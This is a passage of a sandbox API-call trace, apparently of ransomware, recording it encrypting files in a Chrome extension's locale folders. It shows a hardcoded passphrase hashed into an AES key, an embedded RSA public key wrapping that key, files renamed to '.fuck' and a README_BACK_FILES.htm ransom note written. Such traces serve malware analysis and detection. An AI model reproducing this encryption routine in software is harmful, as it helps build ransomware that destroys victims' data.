lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.915] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.915] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.915] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.915] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.915] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.915] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.915] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.915] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.915] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.916] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.916] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.916] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.916] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.916] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.917] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.917] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.917] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.917] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.917] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.918] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.918] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.918] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.918] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.918] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.918] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.918] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.918] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.918] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.919] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.919] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.919] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.919] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xdc, lpOverlapped=0x0) returned 1 [0263.919] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xdc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0263.919] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0263.920] CloseHandle (hObject=0x5d60) returned 1 [0263.920] CloseHandle (hObject=0x5d5c) returned 1 [0263.920] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0263.925] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0263.925] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0263.927] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0263.929] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.929] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.929] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.929] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.929] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.929] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0263.929] AreFileApisANSI () returned 1 [0263.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 165 [0263.930] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.930] GetFileType (hFile=0x5d64) returned 0x1 [0263.930] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.931] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.931] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.932] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.932] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.932] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.932] GetLastError () returned 0x0 [0263.932] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json")) returned 0x20 [0263.933] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0263.933] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.934] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.935] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.935] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.937] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.937] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.937] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.937] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.937] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.937] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.937] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75770) returned 1 [0263.937] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75770, dwCertEncodingType=0x1, pInfo=0x2eafe60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eafe90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eafe98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e380) returned 1 [0263.937] CryptEncrypt (in: hKey=0x2e7e380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.938] CryptEncrypt (in: hKey=0x2e7e380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74de0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74de0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.938] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e74de0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74de0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.938] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.951] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.951] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.958] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.959] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 